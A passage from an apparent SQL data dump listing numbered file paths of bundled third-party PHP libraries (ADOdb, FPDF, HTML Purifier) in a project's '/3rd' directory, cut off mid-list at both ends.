/adodb-vfp.inc.php'),(5815,'/3rd/adodb/lang/adodb-ar.inc.php'),(5816,'/3rd/adodb/lang/adodb-bg.inc.php'),(5817,'/3rd/adodb/lang/adodb-bgutf8.inc.php'),(5818,'/3rd/adodb/lang/adodb-ca.inc.php'),(5819,'/3rd/adodb/lang/adodb-cn.inc.php'),(5820,'/3rd/adodb/lang/adodb-cz.inc.php'),(5821,'/3rd/adodb/lang/adodb-da.inc.php'),(5822,'/3rd/adodb/lang/adodb-de.inc.php'),(5823,'/3rd/adodb/lang/adodb-en.inc.php'),(5824,'/3rd/adodb/lang/adodb-es.inc.php'),(5825,'/3rd/adodb/lang/adodb-esperanto.inc.php'),(5826,'/3rd/adodb/lang/adodb-fr.inc.php'),(5827,'/3rd/adodb/lang/adodb-hu.inc.php'),(5828,'/3rd/adodb/lang/adodb-it.inc.php'),(5829,'/3rd/adodb/lang/adodb-nl.inc.php'),(5830,'/3rd/adodb/lang/adodb-pl.inc.php'),(5831,'/3rd/adodb/lang/adodb-pt-br.inc.php'),(5832,'/3rd/adodb/lang/adodb-ro.inc.php'),(5833,'/3rd/adodb/lang/adodb-sv.inc.php'),(5834,'/3rd/adodb/lang/adodb-uk1251.inc.php'),(5835,'/3rd/adodb/list.php'),(5836,'/3rd/adodb/pear/Auth/Container/ADOdb.php'),(5837,'/3rd/adodb/pear/article.php'),(5838,'/3rd/adodb/perf/perf-db2.inc.php'),(5839,'/3rd/adodb/perf/perf-informix.inc.php'),(5840,'/3rd/adodb/perf/perf-mssql.inc.php'),(5841,'/3rd/adodb/perf/perf-mysql.inc.php'),(5842,'/3rd/adodb/perf/perf-oci8.inc.php'),(5843,'/3rd/adodb/perf/perf-postgres.inc.php'),(5844,'/3rd/adodb/pivottable.inc.php'),(5845,'/3rd/adodb/rsfilter.inc.php'),(5846,'/3rd/adodb/server.php'),(5847,'/3rd/adodb/session/adodb-compress-bzip2.php'),(5848,'/3rd/adodb/session/adodb-compress-gzip.php'),(5849,'/3rd/adodb/session/adodb-cryptsession.php'),(5850,'/3rd/adodb/session/adodb-encrypt-mcrypt.php'),(5851,'/3rd/adodb/session/adodb-encrypt-md5.php'),(5852,'/3rd/adodb/session/adodb-encrypt-secret.php'),(5853,'/3rd/adodb/session/adodb-session-clob.php'),(5854,'/3rd/adodb/session/adodb-session.php'),(5855,'/3rd/adodb/session/crypt.inc.php'),(5856,'/3rd/adodb/session/old/adodb-cryptsession.php'),(5857,'/3rd/adodb/session/old/adodb-session-clob.php'),(5858,'/3rd/adodb/session/old/adodb-session.php'),(5859,'/3rd/adodb/session/old/crypt.inc.php'),(5860,'/3rd/adodb/tests/benchmark.php'),(5861,'/3rd/adodb/tests/client.php'),(5862,'/3rd/adodb/tests/pdo.php'),(5863,'/3rd/adodb/tests/test-datadict.php'),(5864,'/3rd/adodb/tests/test-pgblob.php'),(5865,'/3rd/adodb/tests/test-php5.php'),(5866,'/3rd/adodb/tests/test-xmlschema.php'),(5867,'/3rd/adodb/tests/test.php'),(5868,'/3rd/adodb/tests/test2.php'),(5869,'/3rd/adodb/tests/test3.php'),(5870,'/3rd/adodb/tests/test4.php'),(5871,'/3rd/adodb/tests/test5.php'),(5872,'/3rd/adodb/tests/test_rs_array.php'),(5873,'/3rd/adodb/tests/testcache.php'),(5874,'/3rd/adodb/tests/testdatabases.inc.php'),(5875,'/3rd/adodb/tests/testgenid.php'),(5876,'/3rd/adodb/tests/testmssql.php'),(5877,'/3rd/adodb/tests/testoci8.php'),(5878,'/3rd/adodb/tests/testoci8cursor.php'),(5879,'/3rd/adodb/tests/testpaging.php'),(5880,'/3rd/adodb/tests/testpear.php'),(5881,'/3rd/adodb/tests/testsessions.php'),(5882,'/3rd/adodb/tests/time.php'),(5883,'/3rd/adodb/tests/tmssql.php'),(5884,'/3rd/adodb/toexport.inc.php'),(5885,'/3rd/adodb/tohtml.inc.php'),(5886,'/3rd/excelwriter/excelwriter.inc.php'),(5887,'/3rd/fpdf/font/courier.php'),(5888,'/3rd/fpdf/font/general.php'),(5889,'/3rd/fpdf/font/helvetica.php'),(5890,'/3rd/fpdf/font/helveticab.php'),(5891,'/3rd/fpdf/font/helveticabi.php'),(5892,'/3rd/fpdf/font/helveticai.php'),(5893,'/3rd/fpdf/font/makefont/makefont.php'),(5894,'/3rd/fpdf/font/symbol.php'),(5895,'/3rd/fpdf/font/timesb.php'),(5896,'/3rd/fpdf/font/timesbi.php'),(5897,'/3rd/fpdf/font/timesi.php'),(5898,'/3rd/fpdf/font/zapfdingbats.php'),(5899,'/3rd/htmlpurifier/art/icon-16x16.svg'),(5900,'/3rd/htmlpurifier/art/icon-32x32.svg'),(5901,'/3rd/htmlpurifier/art/logo.svg'),(5902,'/3rd/htmlpurifier/art/stats.php'),(5903,'/3rd/htmlpurifier/benchmarks/Lexer.php'),(5904,'/3rd/htmlpurifier/benchmarks/ProfileDirectLex.php'),(5905,'/3rd/htmlpurifier/benchmarks/Trace.php'),(5906,'/3rd/htmlpurifier/benchmarks/samples/Lexer/1.html'),(5907,'/3rd/htmlpurifier/benchmarks/samples/Lexer/2.html'),(5908,'/3rd/htmlpurifier/benchmarks/samples/Lexer/3.html'),(5909,'/3rd/htmlpurifier/benchmarks/samples/Lexer/4.html'),(5910,'/3rd/htmlpurifier/configdoc/generate.php'),(5911,'/3rd/htmlpurifier/configdoc/library/ConfigDoc/HTMLXSLTProcessor.php'),(5912,'/3rd/htmlpurifier/configdoc/library/ConfigDoc/XMLSerializer/ConfigSchema.php'),(5913,'/3rd/htmlpurifier/configdoc/library/ConfigDoc/XMLSerializer/Types.php'),(5914,'/3rd/htmlpurifier/configdoc/library/ConfigDoc/XMLSerializer.php'),(5915,'/3rd/htmlpurifier/configdoc/library/ConfigDoc.auto.php'),(5916,'/3rd/htmlpurifier/configdoc/library/ConfigDoc.php'),(5917,'/3rd/htmlpurifier/docs/dev-advanced-api.html'),(5918,'/3rd/htmlpurifier/docs/dev-naming.html'),(5919,'/3rd/htmlpurifier/docs/dev-optimization.html'),(5920,'/3rd/htmlpurifier/docs/dev-progress.html'),(5921,'/3rd/htmlpurifier/docs/enduser-customize.html'),(5922,'/3rd/htmlpurifier/docs/enduser-id.html'),(5923,'/3rd/htmlpurifier/docs/enduser-slow.html'),(5924,'/3rd/htmlpurifier/docs/enduser-tidy.html'),(5925,'/3rd/htmlpurifier/docs/enduser-uri-filter.html'),(5926,'/3rd/htmlpurifier/docs/enduser-utf8.html'),(5927,'/3rd/htmlpurifier/docs/enduser-youtube.html'),(5928,'/3rd/htmlpurifier/docs/examples/basic.php'),(5929,'/3rd/htmlpurifier/docs/index.html'),(5930,'/3rd/htmlpurifier/docs/proposal-colors.html'),(5931,'/3rd/htmlpurifier/docs/ref-devnetwork.html'),(5932,'/3rd/htmlpurifier/docs/specimens/html-align-to-css.html'),(5933,'/3rd/htmlpurifier/docs/specimens/windows-live-mail-desktop-beta.html'),(5934,'/3rd/htmlpurifier/library/HTMLPurifier/AttrCollections.php'),(5935,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php'),(5936,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Border.php'),(5937,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Color.php'),(5938,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Composite.php'),(5939,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Font.php'),(5940,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/FontFamily.php'),(5941,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Length.php'),(5942,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/ListStyle.php'),(5943,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Multiple.php'),(5944,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Number.php'),(5945,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Percentage.php'),(5946,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/TextDecoration.php'),(5947,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/URI.php'),(5948,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/CSS.php'),(5949,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/Enum.php'),(5950,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Bool.php'),(5951,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Color.php'),(5952,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/FrameTarget.php'),(5953,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/ID.php'),(5954,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Length.php'),(5955,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/LinkTypes.php'),(5956,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/MultiLength.php'),(5957,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Pixels.php'),(5958,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/Integer.php'),(5959,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/Lang.php'),(5960,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/Text.php'),(5961,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php'),(5962,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email.php'),(5963,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Host.php'),(5964,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv4.php'),(5965,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv6.php'),(5966,'/3rd/htmlpurifier/library/HTMLPurifier/AttrDef/URI.php'),(5967,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/BdoDir.php'),(5968,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/BoolToCSS.php'),(5969,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/Border.php'),(5970,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/EnumToCSS.php'),(5971,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgRequired.php'),(5972,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgSpace.php'),(5973,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/Lang.php'),(5974,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform/Length.php'),(5975,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTransform.php'),(5976,'/3rd/htmlpurifier/library/HTMLPurifier/AttrTypes.php'),(5977,'/3rd/htmlpurifier/library/HTMLPurifier/AttrValidator.php'),(5978,'/3rd/htmlpurifier/library/HTMLPurifier/CSSDefinition.php'),(5979,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef/Chameleon.php'),(5980,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef/Custom.php'),(5981,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef/Empty.php'),(5982,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef/Optional.php'),(5983,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef/Required.php'),(5984,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef/StrictBlockquote.php'),(5985,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef/Table.php'),(5986,'/3rd/htmlpurifier/library/HTMLPurifier/ChildDef.php'),(5987,'/3rd/htmlpurifier/library/HTMLPurifier/Config.php'),(5988,'/3rd/htmlpurifier/library/HTMLPurifier/ConfigDef/DirectiveAlias.php'),(5989,'/3rd/htmlpurifier/library/HTMLPurifier/ConfigDef/Namespace.php'),(5990,'/3rd/htmlpurifier/library/HTMLPurifier/ConfigDef/router.php'),(5991,'/3rd/htmlpurifier/library/HTMLPurifier/ConfigDef.php'),(5992,'/3rd/htmlpurifier/library/HTMLPurifier/ConfigSchema.php'),(5993,'/3rd/htmlpurifier/library/HTMLPurifier/ContentSets.php'),(5994,'/3rd/htmlpurifier/library/HTMLPurifier/Context.php'),(5995,'/3rd/htmlpurifier/library/HTMLPurifier/Definition.php'),(5996,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php'),(5997,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Memory.php'),(5998,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Template.php.in'),(5999,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator.php'),(6000,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCache/Null.php'),(6001,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCache/Serializer.php'),(6002,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCache.php'),(6003,'/3rd/htmlpurifier/library/HTMLPurifier/DefinitionCacheFactory.php'),(6004,'/3rd/htmlpurifier/library/HTMLPurifier/Doctype.php'),(6005,'/3rd/htmlpurifier/library/HTMLPurifier/DoctypeRegistry.php'),(6006,'/3rd/htmlpurifier/library/HTMLPurifier/ElementDef.php'),(6007,'/3rd/htmlpurifier/library/HTMLPurifier/Encoder.php'),(6008,'/3rd/htmlpurifier/library/HTMLPurifier/EntityLookup.php'),(6009,'/3rd/htmlpurifier/library/HTMLPurifier/Error.php'),(6010,'/3rd/htmlpurifier/library/HTMLPurifier/ErrorCollector.php'),(6011,'/3rd/htmlpurifier/library/HTMLPurifier/Filter/YouTube.php'),(6012,'/3rd/htmlpurifier/library/HTMLPurifier/Filter.php'),(6013,'/3rd/htmlpurifier/library/HTMLPurifier/Generator.php'),(6014,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLDefinition.php'),(6015,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Bdo.php'),(6016,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/CommonAttributes.php'),(6017,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Edit.php'),(6018,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Hypertext.php'),(6019,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Image.php'),(6020,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Legacy.php'),(6021,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/List.php'),(6022,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php'),(6023,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Presentation.php'),(6024,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Ruby.php'),(6025,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Scripting.php'),(6026,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/StyleAttribute.php'),(6027,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Tables.php'),(6028,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Target.php'),(6029,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Text.php'),(6030,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Proprietary.php'),(6031,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTML.php'),(6032,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php'),(6033,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTMLStrict.php'),(6034,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModule/XMLCommonAttributes.php'),(6035,'/3rd/htmlpurifier/library/HTMLPurifier/HTMLModuleManager.php'),(6036,'/3rd/htmlpurifier/library/HTMLPurifier/IDAccumulator.php'),(6037,'/3rd/htmlpurifier/library/HTMLPurifier/Injector/AutoParagraph.php'),(6038,'/3rd/htmlpurifier/library/HTMLPurifier/Injector/Linkify.php'),(6039,'/3rd/htmlpurifier/library/HTMLPurifier/Injector/PurifierLinkify.php'),(6040,'/3rd/htmlpurifier/library/HTMLPurifier/Injector.php'),(6041,'/3rd/htmlpurifier/library/HTMLPurifier/Language/classes/en-x-test.php'),(6042,'/3rd/htmlpurifier/library/HTMLPurifier/Language/messages/en-x-test.php'),(6043,'/3rd/htmlpurifier/library/HTMLPurifier/Language/messages/en.php'),(6044,'/3rd/htmlpurifier/library/HTMLPurifier/Language.php'),(6045,'/3rd/htmlpurifier/library/HTMLPurifier/LanguageFactory.php'),(6046,'/3rd/htmlpurifier/library/HTMLPurifier/Lexer/DOMLex.php'),(6047,'/3rd/htmlpurifier/library/HTMLPurifier/Lexer/DirectLex.php'),(6048,'/3rd/htmlpurifier/library/HTMLPurifier/Lexer/PEARSax3.php'),(6049,'/3rd/htmlpurifier/library/HTMLPurifier/Lexer.php'),(6050,'/3rd/htmlpurifier/library/HTMLPurifier/PercentEncoder.php'),(6051,'/3rd/htmlpurifier/library/HTMLPurifier/Printer/CSSDefinition.php'),(6052,'/3rd/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.js'),(6053,'/3rd/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.php'),(6054,'/3rd/htmlpurifier/library/HTMLPurifier/Printer/HTMLDefinition.php'),(6055,'/3rd/htmlpurifier/library/HTMLPurifier/Printer.php'),(6056,'/3rd/htmlpurifier/library/HTMLPurifier/Strategy/Composite.php'),(6057,'/3rd/htmlpurifier/library/HTMLPurifier/Strategy/Core.php'),(6058,'/3rd/htmlpurifier/library/HTMLPurifier/Strategy/FixNesting.php'),(6059,'/3rd/htmlpurifier/library/HTMLPurifier/Strategy/MakeWellFormed.php'),(6060,'/3rd/htmlpurifier/library/HTMLPurifier/Strategy/RemoveForeignElements.php'),(6061,'/3rd/htmlpurifier/library/HTMLPurifier/Strategy/ValidateAttributes.php'),(6062,'/3rd/htmlpurifier/library/HTMLPurifier/Strategy.php'),(6063,'/3rd/htmlpurifier/library/HTMLPurifier/TagTransform/Simple.php'),(6064,'/3rd/htmlpurifier/library/HTMLPurifier/TagTransform.php'),(6065,'/3rd/htmlpurifier/library/HTMLPurifier/Token.php'),(6066,'/3rd/htmlpurifier/library/HTMLPurifier/TokenFactory.php'),(6067,'/3rd/htmlpurifier/library/HTMLPurifier/URI.php'),(6068,'/3rd/htmlpurifier/library/HTMLPurifier/URIDefinition.php'),(6069,'/3rd/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternal.php'),(6070,'/3rd/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternalResources.php'),(6071,'/3rd/htmlpurifier/library/HTMLPurifier/URIFilter/HostBlacklist.php'),(6072,'/3rd/htmlpurifier/library/HTMLPurifier/URIFilter/MakeAbsolute.php'),(6073,'/3rd/htmlpurifier/library/HTMLPurifier/URIFilter/loader.php'),(6074,'/3rd/htmlpurifier/library/HTMLPurifier/URIFilter.php'),(6075,'/3rd/htmlpurifier/library/HTMLPurifier/URIParser.php'),(6076,'/3rd/htmlpurifier/library/HTMLPurifier/URIScheme/ftp.php'),(6077,'/3rd/htmlpurifier/library/HTMLPurifier/URIScheme/http.php'),(6078,'/3rd/htmlpurifier/library/HTMLPurifier/URIScheme/https.php'),(6079,'/3rd/htmlpurifier/library/HTMLPurifier/URIScheme/mailto.php'),(6080,'/3rd/htmlpurifier/library/HTMLPurifier/URIScheme/news.php'),(6081,'/3rd/htmlpurifier/library/HTMLPurifier/URIScheme/nntp.php'),(6082,'/3rd/htmlpurifier/library/HTMLPurifier/URIScheme.php'),(6083,'/3rd/htmlpurifier/library/HTMLPurifier/URISchemeRegistry.php'),(6084,'/3rd/htmlpurifier/library/HTMLPurifier.auto.php'),(6085,'/3rd/htmlpurifier/library/HTMLPurifier.func.php'),(6086,'/3rd/htmlpurifier/maintenance/common.php'),(6087,'/3rd/htmlpurifier/maintenance/flush-definition-cache.php'),(6088,'/3rd/htmlpurifier/maintenance/generate-entity-file.php'),(6089,'/3rd/htmlpurifier/maintenance/merge-library.php'),(6090,'/3rd/htmlpurifier/model.php'),(6091,'/3rd/htmlpurifier/package.php'),(6092,'/3rd/htmlpurifier/plugins/phorum/config.default.php'),(6093,'/3rd/htmlpurifier/plugins/phorum/htmlpurifier.php'),(6094,'/3rd/htmlpurifier/plugins/phorum/init-config.php'),(6095,'/3rd/htmlpurifier/plugins/phorum/migrate.bbcode.php'),(6096,'/3rd/htmlpurifier/plugins/phorum/settings/form.php'),(6097,'/3rd/htmlpurifier/plugins/phorum/settings/migrate-sigs-form.php'),(6098,'/3rd/htmlpurifier/plugins/phorum/settings/migrate-sigs.php'),(6099,'/3rd/htmlpurifier/plugins/phorum/settings/save.php'),(6100,'/3rd/htmlpurifier/plugins/phorum/settings.php'),(6101,'/3rd/htmlpurifier/release2-strict.php'),(6102,'/3rd/htmlpurifier/release3-tag.php'),(6103,'/3rd/htmlpurifier/smoketests/attrTransform.php'),(6104,'/3rd/htmlpurifier/smoketests/basic/allElements.html'),(6105,'/3rd/htmlpurifier/smoketests/basic/cpanel.php'),(6106,'/3rd/htmlpurifier/smoketests/basic/legacy.html'),(6107,'/3rd/htmlpurifier/smoketests/basic.php'),(6108,'/3rd/htmlpurifier/smoketests/common.php'),(6109,'/3rd/htmlpurifier/smoketests/configForm.php'),(6110,'/3rd/htmlpurifier/smoketests/dir.php'),(6111,'/3rd/htmlpurifier/smoketests/loadFunc.php'),(6112,'/3rd/htmlpurifier/smoketests/preserveYouTube.php'),(6113,'/3rd/htmlpurifier/smoketests/printDefinition.php'),(6114,'/3rd/htmlpurifier/smoketests/testSchema.php'),(6115,'/3rd/htmlpurifier/smoketests/utf8.php'),(6116,'/3rd/htmlpurifier/smoketests/variableWidthAttack.php'),(6117,'/3rd/htmlpurifier/smoketests/xssAttacks.php'),(6118,'/3rd/htmlpurifier/svn.php'),(6119,'/3rd/htmlpurifier/test-settings.sample.php'),(6120,'/3rd/htmlpurifier/tests/Debugger.php'),(6121,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrCollectionsTest.php'),(6122,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundPositionTest.php'),(6123,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundTest.php'),(6124,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BorderTest.php'),(6125,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ColorTest.php'),(6126,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/CompositeTest.php'),(6127,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontFamilyTest.php'),(6128,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontTest.php'),(6129,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ListStyleTest.php'),(6130,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/MultipleTest.php'),(6131,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/NumberTest.php'),(6132,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/PercentageTest.php'),(6133,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/TextDecorationTest.php'),(6134,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/URITest.php'),(6135,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/CSSTest.php'),(6136,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/EnumTest.php'),(6137,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/BoolTest.php'),(6138,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/ColorTest.php'),(6139,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/FrameTargetTest.php'),(6140,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/IDTest.php'),(6141,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LengthTest.php'),(6142,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LinkTypesTest.php'),(6143,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/MultiLengthTest.php'),(6144,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/PixelsTest.php'),(6145,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/IntegerTest.php'),(6146,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/LangTest.php'),(6147,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/TextTest.php'),(6148,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/Email/SimpleCheckTest.php'),(6149,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/EmailHarness.php'),(6150,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/HostTest.php'),(6151,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv4Test.php'),(6152,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv6Test.php'),(6153,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDef/URITest.php'),(6154,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDefHarness.php'),(6155,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrDefTest.php'),(6156,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/BdoDirTest.php'),(6157,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/BgColorTest.php'),(6158,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/BoolToCSSTest.php'),(6159,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/BorderTest.php'),(6160,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/EnumToCSSTest.php'),(6161,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgRequiredTest.php'),(6162,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgSpaceTest.php'),(6163,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/LangTest.php'),(6164,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/LengthTest.php'),(6165,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransform/NameTest.php'),(6166,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransformHarness.php'),(6167,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTransformTest.php'),(6168,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrTypesTest.php'),(6169,'/3rd/htmlpurifier/tests/HTMLPurifier/AttrValidator_ErrorsTest.php'),(6170,'/3rd/htmlpurifier/tests/HTMLPurifier/ChildDef/ChameleonTest.php'),(6171,'/3rd/htmlpurifier/tests/HTMLPurifier/ChildDef/CustomTest.php'),(6172,'/3rd/htmlpurifier/tests/HTMLPurifier/ChildDef/OptionalTest.php'),(6173,'/3rd/htmlpurifier/tests/HTMLPurifier/ChildDef/StrictBlockquoteTest.php'),(6174,'/3rd/htmlpurifier/tests/HTMLPurifier/ChildDef/TableTest.php'),(6175,'/3rd/htmlpurifier/tests/HTMLPurifier/ChildDefHarness.php'),(6176,'/3rd/htmlpurifier/tests/HTMLPurifier/ComplexHarness.php'),(6177,'/3rd/htmlpurifier/tests/HTMLPurifier/ConfigSchemaTest.php'),(6178,'/3rd/htmlpurifier/tests/HTMLPurifier/ConfigTest.php'),(6179,'/3rd/htmlpurifier/tests/HTMLPurifier/ContextTest.php'),(6180,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/CleanupTest.php'),(6181,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/MemoryTest.php'),(6182,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorHarness.php'),(6183,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorTest.php'),(6184,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionCache/SerializerTest.php'),(6185,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionCacheHarness.php'),(6186,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionCacheTest.php'),(6187,'/3rd/htmlpurifier/tests/HTMLPurifier/DefinitionTest.php'),(6188,'/3rd/htmlpurifier/tests/HTMLPurifier/DoctypeRegistryTest.php'),(6189,'/3rd/htmlpurifier/tests/HTMLPurifier/ElementDefTest.php'),(6190,'/3rd/htmlpurifier/tests/HTMLPurifier/EncoderTest.php'),(6191,'/3rd/htmlpurifier/tests/HTMLPurifier/EntityLookupTest.php'),(6192,'/3rd/htmlpurifier/tests/HTMLPurifier/EntityParserTest.php'),(6193,'/3rd/htmlpurifier/tests/HTMLPurifier/ErrorCollectorEMock.php'),(6194,'/3rd/htmlpurifier/tests/HTMLPurifier/ErrorsHarness.php'),(6195,'/3rd/htmlpurifier/tests/HTMLPurifier/GeneratorTest.php'),(6196,'/3rd/htmlpurifier/tests/HTMLPurifier/HTMLDefinitionTest.php'),(6197,'/3rd/htmlpurifier/tests/HTMLPurifier/HTMLModule/RubyTest.php'),(6198,'/3rd/htmlpurifier/tests/HTMLPurifier/HTMLModule/ScriptingTest.php'),(6199,'/3rd/htmlpurifier/tests/HTMLPurifier/HTMLModule/TidyTest.php'),(6200,'/3rd/htmlpurifier/tests/HTMLPurifier/HTMLModuleHarness.php'),(6201,'/3rd/htmlpurifier/tests/HTMLPurifier/HTMLModuleManagerTest.php'),(6202,'/3rd/htmlpurifier/tests/HTMLPurifier/HTMLModuleTest.php'),(6203,'/3rd/htmlpurifier/tests/HTMLPurifier/Harness.php'),(6204,'/3rd/htmlpurifier/tests